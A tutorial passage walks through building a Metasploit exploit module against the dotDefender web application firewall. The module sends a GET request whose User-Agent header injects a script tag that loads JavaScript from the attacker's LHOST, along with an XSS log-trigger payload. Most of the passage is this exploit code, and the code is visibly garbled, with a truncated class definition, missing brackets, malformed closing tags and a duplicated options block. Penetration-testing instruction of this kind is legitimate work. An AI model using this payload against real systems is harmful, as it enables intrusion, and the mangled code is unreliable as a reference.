In this section we are going to take a look at sending a GET request to the target. This GET request will contain a User-Agent field with Javascript appended to connect back to Metasploit. The changes to the exploit are highlighted.

# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.

require 'msf/core'

class Metasploit3  "dotDefender  %q{
                    This module exploits a vulnerability found in dotDefender.
            'License'        => MSF_LICENSE,
            'Author'         =>
                    'John Dos',   #Initial remote execution discovery
                    'rAWjAW'  	  #Everything else
            'References'     =>
                    ['EDB', '14310'],
                    ['URL', '']
            'Arch'           => ARCH_CMD,
	   'Compat'          =>
	            'PayloadType' => 'cmd'
            'Platform'       => ['unix','linux'],
            'Targets'        =>
                    ['dotDefender  false,
            'DefaultTarget'  => 0))


   'TRIGGERLOG',  [true, 'This is what is used to trigger a log entry.','<script>alert(\'xss\')>/script>']),'SITENAME',  [true, 'This is usually the same as RHOST but is available as an option if different']),'LHOST',  [true, 'This is the IP to connect back to for the javascript','']),
   'URIPATH', [true, 'This is the URI path that will be created for the javascript hosted file','DotDefender.js']),
   'SRVPORT', [true, 'This is the port for the javascript to connect back to','80']),
            ], self.class)

	def exploit
            resp = send_request_raw({
	         'uri'     => "http://#{rhost}/",
	         'version' => '1.1',
	         'method' => 'GET',
	         'headers' =>
	            'Content-Type' => 'application/x-www-form-urlencoded',
                    'User-Agent' => "Mozilla Firefox <script language=\"JavaScript\" src=\"http://#{datastore['lhost']}:#{datastore['SRVPORT']}/#{datastore['uripath']}\">>/script>",
                  'data' => "#{datastore['TRIGGERLOG']}"



end'TRIGGERLOG',  [true, 'This is what is used to trigger a log entry.','<script>alert(\'xss\')>/script>']),'SITENAME',  [true, 'This is usually the same as RHOST but is available as an option if different'.'']),'LHOST',  [true, 'This is the IP to connect back to for the javascript','']),'URIPATH', [true, 'This is the URI path that will be created for the javascript hosted file','DotDefender.js']),'SRVPORT', [true, 'This is the port for the javascript to connect back to','80'])

When creating our exploit we will need some additional options presented to the user and set some default values on required arguments. We will have more context of these as we continue analyzing the exploit but these serve as a good reference to what purpose each has.

resp = send_request_raw({
	         'uri'     => "http://#{rhost}/",
	         'version' => '1.1',
	         'method' => 'GET',

Here we are creating the exploit GET request that will host the User-Agent javascript. We use the variable #{rhost} as the targeted machine.

'headers' =>
    'Content-Type' => 'application/x-www-form-urlencoded',
    'User-Agent' => "Mozilla Firefox <script language=\"JavaScript\" src=\"http://#{datastore['lhost']}:#{datastore['SRVPORT']}/#{datastore['uripath']}\">>/script>",

This is where the main part of the exploit comes into play. The variables SRVPORT, lhost, and uripath are used to allow as much customization and stealth as possible.

'data' => "#{datastore['TRIGGERLOG']}"

The above code will set the variable TRIGGERLOG to the data of the GET request so that we can actually trigger the log entry in the dotDefender software.


The use of “super” will allow us to run both sets of code when the actual javascript server host is added in the next section.

Hosting the JavaScript
Skeleton Creation